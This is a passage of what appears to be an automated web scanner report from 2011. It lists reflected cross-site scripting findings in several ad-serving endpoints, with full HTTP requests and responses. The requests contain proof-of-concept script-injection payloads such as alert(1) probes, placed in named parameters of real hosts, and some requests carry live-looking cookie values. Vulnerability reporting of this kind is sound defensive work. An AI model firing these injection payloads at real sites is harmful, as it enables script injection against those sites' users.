Cookie: optOut=1; rrs=1006%7C1003%7C3%7C4%7C1004%7C9%7C6; rds=15231%7C15228%7C15248%7C15235%7C15228%7C15228%7C15231; rv=1; uid=2944787775510337379

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json
Content-Length: 69
Date: Sun, 02 Oct 2011 23:39:18 GMT

C1Os7Gk0Jd6Y.b2Zy7Os0Gk6J66ef5<script>alert(1)</script>d34c2adb418={}

2.17. http://ad.yieldmanager.com/getbid [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /getbid

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload cecda<script>alert(1)</script>8fe0763fb0b was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /getbid?Z=300x250&s=796226&_salt={SDC_RND}&r=1&callback=C1Os7Gk0Jd6Y.b0Do7Np0Ww6Scecda<script>alert(1)</script>8fe0763fb0b&cookie=1&flash=1&bvs=&hvs=BBJRUUOOP&u=http%3A%2F%2Fwww.myspace.com%2Feverything HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://demr.opt.fimserve.com/adopt/?r=h&l=87200027&pos=mrec&rnd=596331511
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:38:46 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: crfb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: vuday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0331.rm.sp2
Set-Cookie: ih=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: vuday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: pv1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: crfb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:38:46 GMT
Pragma: no-cache
Content-Length: 509
Content-Type: text/html
Age: 0
Proxy-Connection: close

C1Os7Gk0Jd6Y.b0Do7Np0Ww6Scecda<script>alert(1)</script>8fe0763fb0b={"result":{"cpm":1079,"type":3,"ad":"http://ad.yieldmanager.com/getserved?A4JEAEImDAD0SVUAAAAAALUODwAAAAAAAgAAAAIAAAAAAP8AAAABEz5sFwAAAAAAcJcXAAAAAADsIxUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
...[SNIP]...

2.18. http://ad.yieldmanager.com/getbid [u parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /getbid

Issue detail

The value of the u request parameter is copied into the HTML document as plain text between tags. The payload 3cc2f<script>alert(1)</script>6f59c4c5e7b was submitted in the u parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /getbid?Z=300x250&s=796226&_salt={SDC_RND}&r=1&callback=C1Os7Gk0Jd6Y.b0Do7Np0Ww6S&cookie=1&flash=1&bvs=&hvs=BBJRUUOOP&u=http%3A%2F%2Fwww.myspace.com%2Feverything3cc2f<script>alert(1)</script>6f59c4c5e7b HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://demr.opt.fimserve.com/adopt/?r=h&l=87200027&pos=mrec&rnd=596331511
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:39:21 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: crfb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: vuday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0258.rm.sp2
Set-Cookie: ih=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: vuday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: pv1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: crfb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:39:21 GMT
Pragma: no-cache
Content-Length: 509
Content-Type: text/html
Age: 1
Proxy-Connection: close

C1Os7Gk0Jd6Y.b0Do7Np0Ww6S={"result":{"cpm":1079,"type":3,"ad":"http://ad.yieldmanager.com/getserved?A4JEAEImDAD0SVUAAAAAALUODwAAAAAAAgAAAAIAAAAAAP8AAAABEz5sFwAAAAAAf5cXAAAAAADsIxUAAAAAAAAAAAAAAAAAAAAA
...[SNIP]...
AAAAIAAwAAAAAAceMEz0aeuz-AELdsNkbKP3HjBM9Gnrs.gBC3bDZGyj9X1j6frD7FPwD5AnsCNtQ.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADMNSSsqdrRCkGZPDNuAOke5O7d0fxFf.acmWsZAAAAAA==,,http://www.myspace.com/everything3cc2f<script>alert(1)</script>6f59c4c5e7b&click=[CLICKURL]"}}

2.19. http://adnxs.revsci.net/imp [Z parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adnxs.revsci.net
Path:   /imp

Issue detail

The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5adf9'-alert(1)-'e703109e196 was submitted in the Z parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=728x905adf9'-alert(1)-'e703109e196&s=1628957&r=0&_salt=1639190193&u=http%3A%2F%2Fdelb.opt.fimserve.com%2Fadopt%2F%3Fr%3Dh%26l%3D19200011%26pos%3Dleaderboard%26rnd%3D366162222 HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://delb.opt.fimserve.com/adopt/?r=h&l=19200011&pos=leaderboard&rnd=366162222
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 22:52:41 GMT
Content-Length: 697

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=728x905adf9'-alert(1)-'e703109e196&referrer=http://delb.opt.fimserve.com/adopt/%3Fr=h%26l=19200011%26pos=leaderboard%26rnd=366162222&inv_code=1628957&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUC
...[SNIP]...

2.20. http://adnxs.revsci.net/imp [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adnxs.revsci.net
Path:   /imp

Issue detail

The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb91a'-alert(1)-'1af8fb6eb1c was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=728x90&s=1628957eb91a'-alert(1)-'1af8fb6eb1c&r=0&_salt=1639190193&u=http%3A%2F%2Fdelb.opt.fimserve.com%2Fadopt%2F%3Fr%3Dh%26l%3D19200011%26pos%3Dleaderboard%26rnd%3D366162222 HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://delb.opt.fimserve.com/adopt/?r=h&l=19200011&pos=leaderboard&rnd=366162222
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 22:52:55 GMT
Content-Length: 697

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=728x90&referrer=http://delb.opt.fimserve.com/adopt/%3Fr=h%26l=19200011%26pos=leaderboard%26rnd=366162222&inv_code=1628957eb91a'-alert(1)-'1af8fb6eb1c&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90%26s%3D1628957eb91a%27-alert%281%29-%271af8fb6eb1c%26r%3D0%26_salt%3D1639190193%26u%3Dhttp%253A%
...[SNIP]...

2.21. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 51f23<script>alert(1)</script>3d1eaa1fce was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1500929&pid=211776751f23<script>alert(1)</script>3d1eaa1fce&ps=-1&zw=615&zh=200&url=http%3A//www.nfl.com/&v=5&dct=NFL.com%20-%20Official%20Site%20of%20the%20National%20Football%20League&metakw=nfl,nfl.com,nfl%20scores,nfl%20schedule,nfl%20standing,www.nfl.com,nfl%20stats,nfl%20results HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nfl.com/widget/ads/search-ads?placementId=1500929&pid=2117767&ps=-1&width=615&height=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 22:51:38 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2509


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "211776751f23<script>alert(1)</script>3d1eaa1fce"

   
                                                           </head>
...[SNIP]...

2.22. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 3c709--><script>alert(1)</script>f681079bcf was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=15009293c709--><script>alert(1)</script>f681079bcf&pid=2117767&ps=-1&zw=615&zh=200&url=http%3A//www.nfl.com/&v=5&dct=NFL.com%20-%20Official%20Site%20of%20the%20National%20Football%20League&metakw=nfl,nfl.com,nfl%20scores,nfl%20schedule,nfl%20standing,www.nfl.com,nfl%20stats,nfl%20results HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nfl.com/widget/ads/search-ads?placementId=1500929&pid=2117767&ps=-1&width=615&height=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 22:51:28 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3306
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "15009293c709--><script>alert(1)</script>f681079bcf" -->
...[SNIP]...

2.23. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 239e4--><script>alert(1)</script>ff78946a10b was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1500929&pid=2117767&ps=-1239e4--><script>alert(1)</script>ff78946a10b&zw=615&zh=200&url=http%3A//www.nfl.com/&v=5&dct=NFL.com%20-%20Official%20Site%20of%20the%20National%20Football%20League&metakw=nfl,nfl.com,nfl%20scores,nfl%20schedule,nfl%20standing,www.nfl.com,nfl%20stats,nfl%20results HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nfl.com/widget/ads/search-ads?placementId=1500929&pid=2117767&ps=-1&width=615&height=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 22:51:50 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3748
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-1239e4--><script>alert(1)</script>ff78946a10b" -->
   
...[SNIP]...

2.24. http://ads.pointroll.com/PortalServe/ [flash parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the flash request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66f79'%3balert(1)//f482c983bae was submitted in the flash parameter. This input was echoed as 66f79';alert(1)//f482c983bae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1361629J39720110725194750&flash=1066f79'%3balert(1)//f482c983bae&time=0|18:33|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b94/3/0/%2a/l%3B244123027%3B0-0%3B0%3B5688483%3B2321-160/600%3B43295047/43312834/1%3B%3B%7Eokv%3D%3Bpageid%3Dstats%3Bsz%3D160x600%3Bpos%3D1%3Bvkey%3Dundefined%3Bcontentid%3Dundefined%3B%3Btile%3D2%3B%7Eaopt%3D2/0/8e8d/0%3B%7Esscs%3D%3f$CTURL$&pos=x&xdh=3&dom=http://mlb.mlb.com&r=0.7202382367104292 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=1050620377063751
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CEJ9xErENUwPwYAcUBBeJ6TErNHYxA5IBd7BCeJ5DErTb9CAIFAC9BBeJ7WErTb9avgKAAGBBe; PRgo=BBBAAsJvCBVBF4FRCDhFS!B; PRimp=58AE0400-F5BC-C0E1-020A-10F000FA0100; PRca=|AKjB*15:2|AK9q*1646:2|AK73*1646:1|AKdX*1153:2|AKfC*298:1|AK8l*9320:1|AJtM*1737:2|AJsM*154:1|AKln*9320:3|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKjBAAF7:1|AKjBAAAP:1|AK9qAA08:2|AK73AA08:1|AKdXAASb:2|AKfCAAEo:1|AK8lAC0U:1|AJtMAA2B:2|AJsMAAC4:1|AKlnAC0U:3|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|FwPI:1|FwO9:1|FeMB:1|FeMC:1|FdKz:1|FjZG:1|Fj1N:1|FnKl:1|Fgi2:1|FrMI:1|FrMW:1|F2Bj:1|FrlJ:3|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GYaN:2|GRns:1|GRno:1|GRQ2:1|GUPB:1|GUPA:1|GVWz:1|GWPi:1|GJ9J:1|GMBD:1|GMud:1|GW7X:3|GV2B:1|GV12:2|GSur:3|#; PRpc=|FwPIGYaN:1|FwO9GYaN:1|FeMBGRns:1|FeMCGRno:1|FdKzGRQ2:1|FjZGGUPB:1|Fj1NGUPA:1|FnKlGVWz:1|Fgi2GWPi:1|FrMIGJ9J:1|FrMWGMBD:1|F2BjGMud:1|FrlJGW7X:3|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 02 Oct 2011 23:33:59 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

location.replace('http://mlb.mlb.com/mlb/ads/pointroll/PointRollAds.htm?pid=1361629J39720110725194750&redir=http://ad.doubleclick.net/click%3Bh=v8/3b94/3/0/*/l%3B244123027%3B0-0%3B0%3B5688483%3B2321-160/600%3B43295047/43312834/1%3B%3B~okv=%3Bpageid=stats%3Bsz=160x600%3Bpos=1%3Bvkey=undefined%3Bcontentid=undefined%3B%3Btile=2%3B~aopt=2/0/8e8d/0%3B~sscs=%3F$CTURL$&time=0|18:33|-5&flash=1066f79';alert(1)//f482c983bae&server=portalserve&bu=2242811896');

2.25. http://ads.pointroll.com/PortalServe/ [redir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b326'-alert(1)-'ad2160818d9 was submitted in the redir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1361629J39720110725194750&flash=10&time=0|18:33|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b94/3/0/%2a/l%3B244123027%3B0-0%3B0%3B5688483%3B2321-160/600%3B43295047/43312834/1%3B%3B%7Eokv%3D%3Bpageid%3Dstats%3Bsz%3D160x600%3Bpos%3D1%3Bvkey%3Dundefined%3Bcontentid%3Dundefined%3B%3Btile%3D2%3B%7Eaopt%3D2/0/8e8d/0%3B%7Esscs%3D%3f$CTURL$2b326'-alert(1)-'ad2160818d9&pos=x&xdh=3&dom=http://mlb.mlb.com&r=0.7202382367104292 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=1050620377063751
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CEJ9xErENUwPwYAcUBBeJ6TErNHYxA5IBd7BCeJ5DErTb9CAIFAC9BBeJ7WErTb9avgKAAGBBe; PRgo=BBBAAsJvCBVBF4FRCDhFS!B; PRimp=58AE0400-F5BC-C0E1-020A-10F000FA0100; PRca=|AKjB*15:2|AK9q*1646:2|AK73*1646:1|AKdX*1153:2|AKfC*298:1|AK8l*9320:1|AJtM*1737:2|AJsM*154:1|AKln*9320:3|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKjBAAF7:1|AKjBAAAP:1|AK9qAA08:2|AK73AA08:1|AKdXAASb:2|AKfCAAEo:1|AK8lAC0U:1|AJtMAA2B:2|AJsMAAC4:1|AKlnAC0U:3|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|FwPI:1|FwO9:1|FeMB:1|FeMC:1|FdKz:1|FjZG:1|Fj1N:1|FnKl:1|Fgi2:1|FrMI:1|FrMW:1|F2Bj:1|FrlJ:3|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GYaN:2|GRns:1|GRno:1|GRQ2:1|GUPB:1|GUPA:1|GVWz:1|GWPi:1|GJ9J:1|GMBD:1|GMud:1|GW7X:3|GV2B:1|GV12:2|GSur:3|#; PRpc=|FwPIGYaN:1|FwO9GYaN:1|FeMBGRns:1|FeMCGRno:1|FdKzGRQ2:1|FjZGGUPB:1|Fj1NGUPA:1|FnKlGVWz:1|Fgi2GWPi:1|FrMIGJ9J:1|FrMWGMBD:1|F2BjGMud:1|FrlJGW7X:3|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 02 Oct 2011 23:33:59 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

location.replace('http://mlb.mlb.com/mlb/ads/pointroll/PointRollAds.htm?pid=1361629J39720110725194750&redir=http://ad.doubleclick.net/click%3Bh=v8/3b94/3/0/*/l%3B244123027%3B0-0%3B0%3B5688483%3B2321-160/600%3B43295047/43312834/1%3B%3B~okv=%3Bpageid=stats%3Bsz=160x600%3Bpos=1%3Bvkey=undefined%3Bcontentid=undefined%3B%3Btile=2%3B~aopt=2/0/8e8d/0%3B~sscs=%3F$CTURL$2b326'-alert(1)-'ad2160818d9&time=0|18:33|-5&flash=10&server=portalserve&bu=2683527378');

2.26. http://ads.pointroll.com/PortalServe/ [time parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the time request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 495cf'%3balert(1)//72dae9d4c18 was submitted in the time parameter. This input was echoed as 495cf';alert(1)//72dae9d4c18 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1361629J39720110725194750&flash=10&time=0|18:33|-5495cf'%3balert(1)//72dae9d4c18&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b94/3/0/%2a/l%3B244123027%3B0-0%3B0%3B5688483%3B2321-160/600%3B43295047/43312834/1%3B%3B%7Eokv%3D%3Bpageid%3Dstats%3Bsz%3D160x600%3Bpos%3D1%3Bvkey%3Dundefined%3Bcontentid%3Dundefined%3B%3Btile%3D2%3B%7Eaopt%3D2/0/8e8d/0%3B%7Esscs%3D%3f$CTURL$&pos=x&xdh=3&dom=http://mlb.mlb.com&r=0.7202382367104292 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=1050620377063751
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CEJ9xErENUwPwYAcUBBeJ6TErNHYxA5IBd7BCeJ5DErTb9CAIFAC9BBeJ7WErTb9avgKAAGBBe; PRgo=BBBAAsJvCBVBF4FRCDhFS!B; PRimp=58AE0400-F5BC-C0E1-020A-10F000FA0100; PRca=|AKjB*15:2|AK9q*1646:2|AK73*1646:1|AKdX*1153:2|AKfC*298:1|AK8l*9320:1|AJtM*1737:2|AJsM*154:1|AKln*9320:3|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKjBAAF7:1|AKjBAAAP:1|AK9qAA08:2|AK73AA08:1|AKdXAASb:2|AKfCAAEo:1|AK8lAC0U:1|AJtMAA2B:2|AJsMAAC4:1|AKlnAC0U:3|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|FwPI:1|FwO9:1|FeMB:1|FeMC:1|FdKz:1|FjZG:1|Fj1N:1|FnKl:1|Fgi2:1|FrMI:1|FrMW:1|F2Bj:1|FrlJ:3|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GYaN:2|GRns:1|GRno:1|GRQ2:1|GUPB:1|GUPA:1|GVWz:1|GWPi:1|GJ9J:1|GMBD:1|GMud:1|GW7X:3|GV2B:1|GV12:2|GSur:3|#; 